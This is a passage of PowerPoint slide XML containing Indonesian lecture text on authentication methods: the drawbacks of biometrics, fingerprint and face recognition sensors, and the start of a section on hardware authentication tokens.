            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mahal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengancam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskriminatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterbatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengenalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biometrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>murah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosesnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sidik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tonjolan-tonjolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelembapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kotoran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembacaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengenalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>indikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>optik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inframerah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemalsuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>foto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wajah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27646985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Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keras</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Faktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
